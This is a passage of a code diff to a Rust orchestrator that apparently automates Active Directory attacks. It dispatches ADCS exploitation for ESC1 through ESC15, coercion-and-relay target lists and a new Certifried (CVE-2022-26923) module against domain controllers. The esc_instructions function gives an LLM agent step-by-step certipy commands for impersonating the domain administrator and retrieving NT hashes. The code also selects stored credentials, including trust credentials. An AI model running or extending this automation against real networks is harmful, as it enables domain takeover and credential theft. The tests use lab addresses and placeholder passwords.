req -sid +/// ESC11: RPC relay to ICPR enrollment (certipy relay -target rpc://, coercion role) +/// ESC15: Application policy OID abuse (certipy req -application-policies) +pub(crate) const EXPLOITABLE_ESC_TYPES: &[&str] = &[ "esc1", + "esc2", + "esc3", "esc4", + "esc6", + "esc7", "esc8", + "esc9", + "esc10", + "esc11", + "esc13", + "esc15", "adcs_esc1", + "adcs_esc2", + "adcs_esc3", "adcs_esc4", + "adcs_esc6", + "adcs_esc7", "adcs_esc8", + "adcs_esc9", + "adcs_esc10", + "adcs_esc11", + "adcs_esc13", + "adcs_esc15", ]; /// Monitors for discovered ADCS vulnerabilities and dispatches exploitation tasks. -/// Interval: 30s. +/// Interval: 5s. 
pub async fn auto_adcs_exploitation( dispatcher: Arc, mut shutdown: watch::Receiver, ) { - let mut interval = tokio::time::interval(Duration::from_secs(30)); + let mut interval = tokio::time::interval(Duration::from_secs(5)); interval.set_missed_tick_behavior(tokio::time::MissedTickBehavior::Delay); loop { @@ -104,44 +130,63 @@ pub async fn auto_adcs_exploitation( .unwrap_or("") .to_string(); - let ca_host = extract_ca_host(&vuln.details, &vuln.target); + let ca_host = extract_ca_host(&vuln.details, &vuln.target).or_else(|| { + // When the parser couldn't determine the CA host (empty target), + // resolve it from the CertEnroll share for this domain. + resolve_ca_host_from_shares(&state.shares, &state.hosts, &domain) + }); // For ESC4, we need the account with GenericAll on the template let account_name = extract_account_name(&vuln.details); // Find a credential for exploitation. - // For ESC4, prefer the account that has GenericAll on the template. - // For ESC1/ESC8, any authenticated user in the domain works. - let credential = account_name + // For ESC4, prefer the account that has GenericAll on the + // template (it may live in a different domain than the CA + // — cross-forest ACL edge — so use the source-cred helper). + // For ESC1/ESC8/etc, any authenticated user in the CA's + // domain works; cross-forest ESC8 also accepts a credential + // from a trusting domain because the relay path doesn't + // need same-domain auth (the cert is issued to whatever + // principal lands on the relay). + let account_cred = account_name .as_ref() - .and_then(|acct| { - state.credentials.iter().find(|c| { - c.username.to_lowercase() == acct.to_lowercase() - && (domain.is_empty() - || c.domain.to_lowercase() == domain.to_lowercase()) + .and_then(|acct| state.find_source_credential(acct, &domain)); + + let same_domain_cred = if !domain.is_empty() { + state + .credentials + .iter() + .find(|c| { + c.domain.to_lowercase() == domain.to_lowercase() + && !c.password.is_empty() + && !c.username.starts_with('$') + && !state.is_delegation_account(&c.username) + && !state.is_credential_quarantined(&c.username, &c.domain) }) - }) - .or_else(|| { - // Fall back to any credential for this domain - if !domain.is_empty() { - state.credentials.iter().find(|c| { - c.domain.to_lowercase() == domain.to_lowercase() - && !c.password.is_empty() - && !state.is_delegation_account(&c.username) - && !state.is_credential_quarantined(&c.username, &c.domain) - }) - } else { - state.credentials.iter().find(|c| { - !c.password.is_empty() - && !state.is_delegation_account(&c.username) - && !state.is_credential_quarantined(&c.username, &c.domain) - }) - } - }) - .cloned(); + .cloned() + } else { + state + .credentials + .iter() + .find(|c| { + !c.password.is_empty() + && !c.username.starts_with('$') + && !state.is_delegation_account(&c.username) + && !state.is_credential_quarantined(&c.username, &c.domain) + }) + .cloned() + }; + + let trust_cred = if same_domain_cred.is_none() && !domain.is_empty() { + state.find_trust_credential(&domain) + } else { + None + }; + + let credential = account_cred.or(same_domain_cred).or(trust_cred); if credential.is_none() { - debug!( + info!( vuln_id = %vuln.vuln_id, esc_type = %esc_type, "ADCS exploit skipped: no credential available" @@ -154,6 +199,22 @@ pub async fn auto_adcs_exploitation( .get(&domain.to_lowercase()) .cloned(); + let domain_sid = state.domain_sids.get(&domain.to_lowercase()).cloned(); + + // For coercion-based ESC paths (esc8/esc11), build a + // tier-ordered candidate list of 
coerce targets so the LLM + // agent can iterate when the first one's callback drifts. + let coerce_candidates = if matches!(esc_type.as_str(), "esc8" | "esc11") { + pick_coerce_targets( + ca_host.as_deref(), + dc_ip.as_deref(), + &state.domain_controllers, + &state.hosts, + ) + } else { + Vec::new() + }; + Some(AdcsExploitWork { vuln_id: vuln.vuln_id.clone(), dedup_key, @@ -163,13 +224,49 @@ pub async fn auto_adcs_exploitation( ca_host, domain, dc_ip, + domain_sid, credential, + coerce_candidates, }) }) .collect() }; for item in work { + let role = role_for_esc_type(&item.esc_type); + + // Coercion-based ESC paths (ESC8, ESC11) need a relay listener and + // a coerce target that is not the CA itself — Windows NTLM + // same-machine loopback protection blocks relay back to the + // coerced host. Without these, the dispatched task cannot succeed. + let (coerce_target, coerce_targets, listener_ip) = if role == "coercion" { + let listener = match dispatcher.config.listener_ip.as_deref() { + Some(ip) => ip.to_string(), + None => { + debug!( + vuln_id = %item.vuln_id, + esc_type = %item.esc_type, + "ADCS coercion exploit skipped: no listener_ip configured" + ); + continue; + } + }; + if item.coerce_candidates.is_empty() { + debug!( + vuln_id = %item.vuln_id, + esc_type = %item.esc_type, + ca_host = ?item.ca_host, + "ADCS coercion exploit skipped: no coerce target distinct from ca_host" + ); + continue; + } + let primary = item.coerce_candidates[0].clone(); + let all = item.coerce_candidates.clone(); + (Some(primary), Some(all), Some(listener)) + } else { + (None, None, None) + }; + let mut payload = json!({ "technique": format!("adcs_{}", item.esc_type), "vuln_type": format!("adcs_{}", item.esc_type), @@ -177,6 +274,7 @@ pub async fn auto_adcs_exploitation( "esc_type": item.esc_type, "domain": item.domain, "impersonate": "administrator", + "instructions": esc_instructions(&item.esc_type), }); if let Some(ref ca) = item.ca_name { @@ -192,6 +290,23 @@ pub async fn auto_adcs_exploitation( if let Some(ref dc) = item.dc_ip { payload["dc_ip"] = json!(dc); } + if let Some(ref sid) = item.domain_sid { + payload["domain_sid"] = json!(sid); + // Administrator RID is always 500 + payload["admin_sid"] = json!(format!("{sid}-500")); + } + + if let Some(ref ip) = listener_ip { + payload["listener_ip"] = json!(ip); + } + if let Some(ref t) = coerce_target { + payload["coerce_target"] = json!(t); + } + if let Some(ref ts) = coerce_targets { + if !ts.is_empty() { + payload["coerce_targets"] = json!(ts); + } + } if let Some(ref cred) = item.credential { payload["username"] = json!(cred.username); @@ -203,10 +318,6 @@ pub async fn auto_adcs_exploitation( }); } - // ESC8 uses coercion+relay, dispatch to coercion role. - // ESC1/ESC4 use certipy directly, dispatch to privesc role. - let role = role_for_esc_type(&item.esc_type); - let priority = dispatcher.effective_priority(&format!("adcs_{}", item.esc_type)); match dispatcher .throttled_submit("exploit", role, payload, priority) @@ -300,13 +411,190 @@ fn extract_account_name( .map(|s| s.to_string()) } +/// Resolve CA host IP from CertEnroll shares when the vuln has no target. +/// Looks for a CertEnroll share whose host belongs to the given domain. +/// Falls back to any CertEnroll share if no domain-matched share is found. 
+fn resolve_ca_host_from_shares(
+    shares: &[ares_core::models::Share],
+    hosts: &[ares_core::models::Host],
+    domain: &str,
+) -> Option<String> {
+    let certenroll_shares: Vec<_> = shares
+        .iter()
+        .filter(|s| s.name.to_lowercase() == "certenroll")
+        .collect();
+
+    if certenroll_shares.is_empty() {
+        return None;
+    }
+
+    // Try domain-matched share first
+    if !domain.is_empty() {
+        let domain_lower = domain.to_lowercase();
+        if let Some(s) = certenroll_shares.iter().find(|s| {
+            hosts.iter().any(|h| {
+                (h.ip == s.host || h.hostname.to_lowercase() == s.host.to_lowercase())
+                    && h.hostname.to_lowercase().ends_with(&domain_lower)
+            })
+        }) {
+            return Some(s.host.clone());
+        }
+    }
+
+    // Fall back to any CertEnroll share (likely the CA for this environment)
+    certenroll_shares.first().map(|s| s.host.clone())
+}
+
+/// Build a tier-ordered list of viable coerce targets for ESC8/ESC11,
+/// excluding the CA host (Windows NTLM same-machine loopback blocks relay
+/// back to the coerced host). Tiers: (1) the vuln-domain DC, (2) any other
+/// DCs in state, (3) Windows member servers in state. The agent iterates
+/// the list when an earlier candidate's callback drifts (a real lab
+/// failure mode — see `relay_and_coerce_validation.md`). Comparison against
+/// `ca_host` is case-insensitive.
+fn pick_coerce_targets(
+    ca_host: Option<&str>,
+    dc_ip: Option<&str>,
+    domain_controllers: &std::collections::HashMap<String, String>,
+    hosts: &[ares_core::models::Host],
+) -> Vec<String> {
+    let ca_lower = ca_host.map(str::to_lowercase);
+    let mut out: Vec<String> = Vec::new();
+    let push_unique = |out: &mut Vec<String>, candidate: &str| {
+        if candidate.is_empty() {
+            return;
+        }
+        let cand_lower = candidate.to_lowercase();
+        if ca_lower.as_deref() == Some(cand_lower.as_str()) {
+            return;
+        }
+        if !out.iter().any(|e| e.to_lowercase() == cand_lower) {
+            out.push(candidate.to_string());
+        }
+    };
+
+    // Tier 1: vuln-domain DC.
+    if let Some(dc) = dc_ip {
+        push_unique(&mut out, dc);
+    }
+    // Tier 2: other DCs in state (cross-domain coercion is fine for ESC8 —
+    // the CA accepts any authenticated machine account).
+    for ip in domain_controllers.values() {
+        push_unique(&mut out, ip);
+    }
+    // Tier 3: Windows member servers (bypass DC callback drift). We check
+    // both the OS string and SMB service exposure since `os` is not always
+    // populated.
+    for h in hosts {
+        if h.is_dc {
+            continue;
+        }
+        let is_windows = h.os.to_lowercase().contains("windows")
+            || h.services.iter().any(|s| {
+                let s = s.to_lowercase();
+                s.contains("microsoft-ds") || s.contains("netbios-ssn")
+            });
+        if is_windows {
+            push_unique(&mut out, &h.ip);
+        }
+    }
+
+    out
+}
+
 /// Determine the dispatch role for a given ESC type.
-/// ESC8 uses coercion+relay (coercion role), while ESC1/ESC4 use certipy directly (privesc role).
+/// ESC8 uses coercion+relay (coercion role), while all others use certipy directly (privesc role).
 fn role_for_esc_type(esc_type: &str) -> &'static str {
-    if esc_type == "esc8" {
-        "coercion"
-    } else {
-        "privesc"
+    match esc_type {
+        "esc8" | "esc11" => "coercion",
+        _ => "privesc",
+    }
+}
+
+/// Return ESC-type-specific exploitation instructions for the LLM agent.
+fn esc_instructions(esc_type: &str) -> &'static str {
+    match esc_type {
+        "esc1" => concat!(
+            "ESC1: Enrollee supplies Subject Alternative Name (SAN).\n",
+            "Use certipy_request with template, ca (CA name), upn='administrator@<domain>',\n",
+            "dc_ip (domain controller), target (CA server IP from ca_host field),\n",
+            "and sid (use admin_sid from payload, e.g. S-1-5-21-...-500).\n",
+            "IMPORTANT: The 'target' param MUST be the CA server (ca_host), NOT the DC.\n",
+            "IMPORTANT: Include 'sid' param (admin_sid) to avoid SID mismatch in certipy_auth.\n",
+            "Then use certipy_auth with the resulting .pfx to get the NT hash."
+        ),
+        "esc2" => concat!(
+            "ESC2: Any Purpose EKU allows client auth.\n",
+            "Use certipy_request with template, ca, dc_ip, target=ca_host, and sid=admin_sid.\n",
+            "IMPORTANT: Set target to the ca_host IP, not the dc_ip.\n",
+            "IMPORTANT: Include 'sid' param (admin_sid) to avoid SID mismatch in certipy_auth.\n",
+            "Then use certipy_auth with the resulting .pfx."
+        ),
+        "esc3" => concat!(
+            "ESC3: Certificate Request Agent (enrollment agent).\n",
+            "Step 1: certipy_request the CRA template with target=ca_host.\n",
+            "Step 2: Use that cert to request a cert on behalf of administrator.\n",
+            "IMPORTANT: Set target to the ca_host IP, not the dc_ip."
+        ),
+        "esc4" => concat!(
+            "ESC4: Template ACL abuse — attacker has GenericAll on a template.\n",
+            "Use certipy_esc4_full_chain which modifies the template to be ESC1-vulnerable,\n",
+            "requests a cert as administrator, then restores the original template.\n",
+            "IMPORTANT: Set target to the ca_host IP for certificate enrollment."
+        ),
+        "esc6" => concat!(
+            "ESC6: EDITF_ATTRIBUTESUBJECTALTNAME2 flag on the CA.\n",
+            "Use certipy_request with any template that allows client auth,\n",
+            "adding upn='administrator@<domain>', target=ca_host, and sid=admin_sid.\n",
+            "IMPORTANT: Set target to the ca_host IP, not the dc_ip.\n",
+            "IMPORTANT: Include 'sid' param (admin_sid) to avoid SID mismatch.\n",
+            "Then use certipy_auth with the resulting .pfx."
+        ),
+        "esc7" => concat!(
+            "ESC7: ManageCA privilege abuse.\n",
+            "Use certipy_esc7_full_chain to execute the full chain: add-officer → request SubCA cert (denied) → issue pending request → retrieve cert → authenticate.\n",
+            "IMPORTANT: Set target to the ca_host IP (CA server, not DC).\n",
+            "IMPORTANT: Include 'sid' param (admin_sid from payload) to avoid SID mismatch in certipy v5.\n",
+            "The tool handles all 5 steps automatically and returns the NT hash."
+        ),
+        "esc9" => concat!(
+            "ESC9: GenericAll on a user allows UPN spoofing.\n",
+            "If you have GenericAll on a user, change their UPN to administrator@<domain>,\n",
+            "request a cert using the modified user, then restore the original UPN.\n",
+            "Use certipy_request (with target=ca_host) then certipy_auth.\n",
+            "IMPORTANT: Set target to the ca_host IP, not the dc_ip."
+        ),
+        "esc10" => concat!(
+            "ESC10: Weak Certificate Mapping (StrongCertificateBindingEnforcement=0).\n",
+            "The DC does not enforce strong cert-to-account binding.\n",
+            "Use certipy_request with template, ca, target=ca_host, and sid=admin_sid.\n",
+            "The -sid flag embeds the target SID in the cert, bypassing weak mapping.\n",
+            "IMPORTANT: Set target to the ca_host IP, not the dc_ip.\n",
+            "Then use certipy_auth with the resulting .pfx."
+        ),
+        "esc11" => concat!(
+            "ESC11: RPC relay to ICPR certificate enrollment (IF_ENFORCEENCRYPTICERTREQUEST disabled).\n",
+            "Use certipy_relay with target='rpc://<CA_IP>' and ca=<CA_NAME>.\n",
+            "This starts a relay listener that accepts coerced NTLM auth and relays it\n",
+            "to the CA's RPC enrollment endpoint to obtain a certificate.\n",
+            "Combine with coercion (PetitPotam, PrinterBug) to trigger auth from a DC.\n",
+            "After relay captures a cert, use certipy_auth with the .pfx."
+        ),
+        "esc13" => concat!(
+            "ESC13: Issuance Policy linked to a group.\n",
+            "Use certipy_request with the ESC13 template and target=ca_host.\n",
+            "IMPORTANT: Set target to the ca_host IP, not the dc_ip.\n",
+            "Then use certipy_auth with the resulting .pfx."
+        ),
+        "esc15" => concat!(
+            "ESC15 (CVE-2024-49019): Application policy OID abuse.\n",
+            "Use certipy_request with template, ca, target=ca_host,\n",
+            "and application_policies=<OID> (e.g. '1.3.6.1.5.5.7.3.2' for Client Authentication).\n",
+            "The application policy OID overrides the template's EKU restrictions.\n",
+            "IMPORTANT: Set target to the ca_host IP, not the dc_ip.\n",
+            "Then use certipy_auth with the resulting .pfx."
+        ),
+        _ => "Use certipy_request with the template and CA, then certipy_auth with the .pfx. Set target to ca_host.",
+    }
+}
+
@@ -319,7 +607,13 @@ struct AdcsExploitWork {
     ca_host: Option<String>,
     domain: String,
     dc_ip: Option<String>,
+    domain_sid: Option<String>,
     credential: Option<ares_core::models::Credential>,
+    /// Tier-ordered coerce target candidates (esc8/esc11 only). Empty for
+    /// non-coercion ESC types. The dispatcher passes the first as
+    /// `coerce_target` (legacy) and the full list as `coerce_targets` so the
+    /// agent can iterate when the first target's callback drifts.
+    coerce_candidates: Vec<String>,
 }
 
 #[cfg(test)]
@@ -353,11 +647,29 @@ mod tests {
     #[test]
     fn is_exploitable_esc_type_positive() {
         assert!(is_exploitable_esc_type("esc1"));
+        assert!(is_exploitable_esc_type("esc2"));
+        assert!(is_exploitable_esc_type("esc3"));
         assert!(is_exploitable_esc_type("esc4"));
+        assert!(is_exploitable_esc_type("esc6"));
+        assert!(is_exploitable_esc_type("esc7"));
         assert!(is_exploitable_esc_type("esc8"));
+        assert!(is_exploitable_esc_type("esc9"));
+        assert!(is_exploitable_esc_type("esc10"));
+        assert!(is_exploitable_esc_type("esc11"));
+        assert!(is_exploitable_esc_type("esc13"));
+        assert!(is_exploitable_esc_type("esc15"));
         assert!(is_exploitable_esc_type("adcs_esc1"));
+        assert!(is_exploitable_esc_type("adcs_esc2"));
+        assert!(is_exploitable_esc_type("adcs_esc3"));
         assert!(is_exploitable_esc_type("adcs_esc4"));
+        assert!(is_exploitable_esc_type("adcs_esc6"));
+        assert!(is_exploitable_esc_type("adcs_esc7"));
         assert!(is_exploitable_esc_type("adcs_esc8"));
+        assert!(is_exploitable_esc_type("adcs_esc9"));
+        assert!(is_exploitable_esc_type("adcs_esc10"));
+        assert!(is_exploitable_esc_type("adcs_esc11"));
+        assert!(is_exploitable_esc_type("adcs_esc13"));
+        assert!(is_exploitable_esc_type("adcs_esc15"));
     }
 
     #[test]
@@ -370,13 +682,13 @@ mod tests {
 
     #[test]
     fn is_exploitable_esc_type_negative() {
-        assert!(!is_exploitable_esc_type("esc2"));
-        assert!(!is_exploitable_esc_type("esc3"));
+        assert!(!is_exploitable_esc_type("esc5"));
+        assert!(!is_exploitable_esc_type("esc14"));
         assert!(!is_exploitable_esc_type("rbcd"));
         assert!(!is_exploitable_esc_type("shadow_credentials"));
         assert!(!is_exploitable_esc_type("genericall"));
         assert!(!is_exploitable_esc_type(""));
-        assert!(!is_exploitable_esc_type("adcs_esc2"));
+        assert!(!is_exploitable_esc_type("adcs_esc5"));
     }
 
     // normalize_esc_type
@@ -709,6 +1021,11 @@ mod tests {
         assert_eq!(role_for_esc_type("esc8"), "coercion");
     }
 
+    #[test]
+    fn role_for_esc11_is_coercion() {
+        assert_eq!(role_for_esc_type("esc11"), "coercion");
+    }
+
     #[test]
     fn role_for_esc1_is_privesc() {
         assert_eq!(role_for_esc_type("esc1"), "privesc");
     }
 
@@ -719,6 +1036,16 @@ mod tests {
         assert_eq!(role_for_esc_type("esc4"), "privesc");
     }
 
+    #[test]
+    fn role_for_esc10_is_privesc() {
+        assert_eq!(role_for_esc_type("esc10"), "privesc");
+    }
+
+    #[test]
+    fn
role_for_esc15_is_privesc() {
+        assert_eq!(role_for_esc_type("esc15"), "privesc");
+    }
+
     #[test]
     fn role_for_unknown_defaults_to_privesc() {
         assert_eq!(role_for_esc_type("esc99"), "privesc");
@@ -830,4 +1157,130 @@ mod tests {
         );
         assert_eq!(extract_account_name(&details), None);
     }
+
+    // pick_coerce_targets
+
+    fn windows_host(ip: &str, hostname: &str) -> ares_core::models::Host {
+        ares_core::models::Host {
+            ip: ip.to_string(),
+            hostname: hostname.to_string(),
+            os: "Windows Server 2019".to_string(),
+            roles: Vec::new(),
+            services: vec!["microsoft-ds".to_string()],
+            is_dc: false,
+            owned: false,
+        }
+    }
+
+    fn dc_host(ip: &str, hostname: &str) -> ares_core::models::Host {
+        ares_core::models::Host {
+            ip: ip.to_string(),
+            hostname: hostname.to_string(),
+            os: "Windows Server 2019".to_string(),
+            roles: Vec::new(),
+            services: vec!["microsoft-ds".to_string()],
+            is_dc: true,
+            owned: false,
+        }
+    }
+
+    fn linux_host(ip: &str) -> ares_core::models::Host {
+        ares_core::models::Host {
+            ip: ip.to_string(),
+            hostname: format!("linux-{ip}"),
+            os: "Ubuntu 22.04".to_string(),
+            roles: Vec::new(),
+            services: vec!["ssh".to_string()],
+            is_dc: false,
+            owned: false,
+        }
+    }
+
+    #[test]
+    fn pick_coerce_targets_prefers_vuln_domain_dc() {
+        let dcs: HashMap<String, String> =
+            [("contoso.local".to_string(), "192.168.58.20".to_string())]
+                .into_iter()
+                .collect();
+        let out = pick_coerce_targets(Some("192.168.58.10"), Some("192.168.58.20"), &dcs, &[]);
+        assert_eq!(out, vec!["192.168.58.20".to_string()]);
+    }
+
+    #[test]
+    fn pick_coerce_targets_excludes_ca_host() {
+        let dcs: HashMap<String, String> =
+            [("contoso.local".to_string(), "192.168.58.10".to_string())]
+                .into_iter()
+                .collect();
+        let out = pick_coerce_targets(
+            Some("192.168.58.10"),
+            Some("192.168.58.10"),
+            &dcs,
+            &[windows_host("192.168.58.10", "ca-and-dc")],
+        );
+        assert!(out.is_empty(), "CA host must not appear: {out:?}");
+    }
+
+    #[test]
+    fn pick_coerce_targets_falls_back_to_member_servers() {
+        let dcs: HashMap<String, String> =
+            [("contoso.local".to_string(), "192.168.58.10".to_string())]
+                .into_iter()
+                .collect();
+        let hosts = vec![
+            dc_host("192.168.58.10", "dc01"),
+            windows_host("192.168.58.51", "ws01"),
+            linux_host("192.168.58.99"),
+        ];
+        let out = pick_coerce_targets(Some("192.168.58.10"), Some("192.168.58.10"), &dcs, &hosts);
+        // CA excluded; only Windows non-DC member server remains.
+        assert_eq!(out, vec!["192.168.58.51".to_string()]);
+    }
+
+    #[test]
+    fn pick_coerce_targets_orders_dc_then_other_dcs_then_members() {
+        let dcs: HashMap<String, String> = [
+            ("contoso.local".to_string(), "192.168.58.20".to_string()),
+            ("fabrikam.local".to_string(), "192.168.58.30".to_string()),
+        ]
+        .into_iter()
+        .collect();
+        let hosts = vec![windows_host("192.168.58.51", "ws01")];
+        let out = pick_coerce_targets(Some("192.168.58.10"), Some("192.168.58.20"), &dcs, &hosts);
+        // Tier 1 (vuln-domain DC) first.
+        assert_eq!(out[0], "192.168.58.20");
+        // Tier 2 (other DC) and Tier 3 (member) both present, no CA.
+        assert!(out.contains(&"192.168.58.30".to_string()));
+        assert!(out.contains(&"192.168.58.51".to_string()));
+        assert!(!out.contains(&"192.168.58.10".to_string()));
+    }
+
+    #[test]
+    fn pick_coerce_targets_dedups_dc_appearing_in_hosts_list() {
+        let dcs: HashMap<String, String> =
+            [("contoso.local".to_string(), "192.168.58.20".to_string())]
+                .into_iter()
+                .collect();
+        let hosts = vec![dc_host("192.168.58.20", "dc01")];
+        let out = pick_coerce_targets(Some("192.168.58.10"), Some("192.168.58.20"), &dcs, &hosts);
+        assert_eq!(out, vec!["192.168.58.20".to_string()]);
+    }
+
+    #[test]
+    fn pick_coerce_targets_ca_match_is_case_insensitive() {
+        let dcs: HashMap<String, String> = HashMap::new();
+        let hosts = vec![windows_host("DC01.contoso.local", "dc01")];
+        let out = pick_coerce_targets(Some("dc01.contoso.local"), None, &dcs, &hosts);
+        assert!(
+            out.is_empty(),
+            "CA hostname (case-mismatched) must be excluded"
+        );
+    }
+
+    #[test]
+    fn pick_coerce_targets_empty_when_no_inputs() {
+        let dcs: HashMap<String, String> = HashMap::new();
+        let out = pick_coerce_targets(Some("192.168.58.10"), None, &dcs, &[]);
+        assert!(out.is_empty());
+    }
+}
diff --git a/ares-cli/src/orchestrator/automation/bloodhound.rs b/ares-cli/src/orchestrator/automation/bloodhound.rs
index 8b805cea..f2c1342c 100644
--- a/ares-cli/src/orchestrator/automation/bloodhound.rs
+++ b/ares-cli/src/orchestrator/automation/bloodhound.rs
@@ -40,7 +40,7 @@ pub async fn auto_bloodhound(dispatcher: Arc<Dispatcher>, mut shutdown: watch::R
         .iter()
         .filter(|d| !state.is_processed(DEDUP_BLOODHOUND_DOMAINS, d))
         .filter_map(|domain| {
-            let dc_ip = state.domain_controllers.get(domain).cloned()?;
+            let dc_ip = state.resolve_dc_ip(domain)?;
             // Select best credential for this specific domain
             let cred = find_domain_credential(
                 domain,
diff --git a/ares-cli/src/orchestrator/automation/certifried.rs b/ares-cli/src/orchestrator/automation/certifried.rs
new file mode 100644
index 00000000..ed15806d
--- /dev/null
+++ b/ares-cli/src/orchestrator/automation/certifried.rs
@@ -0,0 +1,485 @@
+//! auto_certifried -- CVE-2022-26923 machine account DNS hostname spoofing.
+//!
+//! Certifried abuses the fact that machine accounts can enroll for certificates
+//! and the DNS hostname in the certificate is derived from the machine account's
+//! dNSHostName attribute. By creating a machine account and setting its
+//! dNSHostName to a DC's hostname, you can obtain a certificate that
+//! authenticates as the DC.
+//!
+//! Prerequisites:
+//! - MachineAccountQuota > 0 (default 10)
+//! - Valid domain credential
+//! - ADCS CA discovered
+//!
+//! Dispatches to "privesc" role with technique "certifried".
+
+use std::sync::Arc;
+use std::time::Duration;
+
+use serde_json::json;
+use tokio::sync::watch;
+use tracing::{debug, info, warn};
+
+use crate::orchestrator::dispatcher::Dispatcher;
+use crate::orchestrator::state::*;
+
+/// Collect certifried work items from current state.
+///
+/// Pure logic extracted from `auto_certifried` so it can be unit-tested
+/// without needing a `Dispatcher` or async runtime.
+fn collect_certifried_work(state: &StateInner) -> Vec<CertifriedWork> {
+    if state.credentials.is_empty() {
+        return Vec::new();
+    }
+
+    let mut items = Vec::new();
+
+    for (domain, dc_ip) in &state.all_domains_with_dcs() {
+        let dedup_key = format!("certifried:{}", domain.to_lowercase());
+        if state.is_processed(DEDUP_CERTIFRIED, &dedup_key) {
+            continue;
+        }
+
+        // Find the DC host to get its hostname for spoofing
+        let dc_hostname = state
+            .hosts
+            .iter()
+            .find(|h| h.ip == *dc_ip && h.is_dc)
+            .map(|h| h.hostname.clone())
+            .filter(|h| !h.is_empty());
+
+        // Certifried creates a machine account in the TARGET domain via MAQ.
+        // Cross-forest credentials cannot create machine accounts in a foreign
+        // forest, so require a credential whose domain matches the target.
+        let cred = match state.credentials.iter().find(|c| {
+            c.domain.to_lowercase() == domain.to_lowercase()
+                && !c.password.is_empty()
+                && !state.is_credential_quarantined(&c.username, &c.domain)
+        }) {
+            Some(c) => c.clone(),
+            None => continue,
+        };
+
+        items.push(CertifriedWork {
+            dedup_key,
+            domain: domain.clone(),
+            dc_ip: dc_ip.clone(),
+            dc_hostname,
+            credential: cred,
+        });
+    }
+
+    items
+}
+
+/// Dispatches certifried (CVE-2022-26923) per domain with ADCS.
+/// Interval: 45s.
+pub async fn auto_certifried(dispatcher: Arc<Dispatcher>, mut shutdown: watch::Receiver<bool>) {
+    let mut interval = tokio::time::interval(Duration::from_secs(45));
+    interval.set_missed_tick_behavior(tokio::time::MissedTickBehavior::Delay);
+
+    loop {
+        tokio::select! {
+            _ = interval.tick() => {},
+            _ = shutdown.changed() => break,
+        }
+        if *shutdown.borrow() {
+            break;
+        }
+
+        if !dispatcher.is_technique_allowed("certifried") {
+            continue;
+        }
+
+        let work = {
+            let state = dispatcher.state.read().await;
+            collect_certifried_work(&state)
+        };
+
+        for item in work {
+            let payload = json!({
+                "technique": "certifried",
+                "cve": "CVE-2022-26923",
+                "target_ip": item.dc_ip,
+                "domain": item.domain,
+                "dc_hostname": item.dc_hostname,
+                "credential": {
+                    "username": item.credential.username,
+                    "password": item.credential.password,
+                    "domain": item.credential.domain,
+                },
+            });
+
+            let priority = dispatcher.effective_priority("certifried");
+            match dispatcher
+                .throttled_submit("exploit", "privesc", payload, priority)
+                .await
+            {
+                Ok(Some(task_id)) => {
+                    info!(
+                        task_id = %task_id,
+                        domain = %item.domain,
+                        dc = %item.dc_ip,
+                        "Certifried (CVE-2022-26923) dispatched"
+                    );
+                    dispatcher
+                        .state
+                        .write()
+                        .await
+                        .mark_processed(DEDUP_CERTIFRIED, item.dedup_key.clone());
+                    let _ = dispatcher
+                        .state
+                        .persist_dedup(&dispatcher.queue, DEDUP_CERTIFRIED, &item.dedup_key)
+                        .await;
+                }
+                Ok(None) => {
+                    debug!(domain = %item.domain, "Certifried deferred");
+                }
+                Err(e) => {
+                    warn!(err = %e, domain = %item.domain, "Failed to dispatch certifried");
+                }
+            }
+        }
+    }
+}
+
+struct CertifriedWork {
+    dedup_key: String,
+    domain: String,
+    dc_ip: String,
+    dc_hostname: Option<String>,
+    credential: ares_core::models::Credential,
+}
+
+#[cfg(test)]
+mod tests {
+    use super::*;
+    use ares_core::models::{Credential, Host};
+
+    fn make_credential(username: &str, password: &str, domain: &str) -> Credential {
+        Credential {
+            id: format!("c-{username}"),
+            username: username.into(),
+            password: password.into(), // pragma: allowlist secret
+            domain: domain.into(),
+            source: "test".into(),
+            is_admin: false,
+            discovered_at: None,
+            parent_id: None,
+            attack_step: 0,
+        }
+    }
+
+    fn make_host(ip: &str, hostname: &str, is_dc: bool) -> Host {
+        Host {
+            ip: ip.into(),
+            hostname:
hostname.into(), + os: String::new(), + roles: Vec::new(), + services: Vec::new(), + is_dc, + owned: false, + } + } + + // --- collect_certifried_work tests --- + + #[test] + fn collect_empty_state_returns_no_work() { + let state = StateInner::new("test-op".into()); + let work = collect_certifried_work(&state); + assert!(work.is_empty()); + } + + #[test] + fn collect_no_credentials_returns_no_work() { + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + let work = collect_certifried_work(&state); + assert!(work.is_empty()); + } + + #[test] + fn collect_single_domain_produces_work() { + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + let work = collect_certifried_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].domain, "contoso.local"); + assert_eq!(work[0].dc_ip, "192.168.58.10"); + assert_eq!(work[0].dedup_key, "certifried:contoso.local"); + assert_eq!(work[0].credential.username, "admin"); + } + + #[test] + fn collect_dedup_skips_already_processed() { + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + state.mark_processed(DEDUP_CERTIFRIED, "certifried:contoso.local".into()); + let work = collect_certifried_work(&state); + assert!(work.is_empty()); + } + + #[test] + fn collect_multiple_domains() { + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state + .domain_controllers + .insert("fabrikam.local".into(), "192.168.58.20".into()); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + state + .credentials + .push(make_credential("svcacct", "Svc!Pass1", "fabrikam.local")); // pragma: allowlist secret + let work = collect_certifried_work(&state); + assert_eq!(work.len(), 2); + let domains: Vec<&str> = work.iter().map(|w| w.domain.as_str()).collect(); + assert!(domains.contains(&"contoso.local")); + assert!(domains.contains(&"fabrikam.local")); + } + + #[test] + fn collect_dc_hostname_resolved_from_hosts() { + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + state + .hosts + .push(make_host("192.168.58.10", "dc01.contoso.local", true)); + let work = collect_certifried_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].dc_hostname, 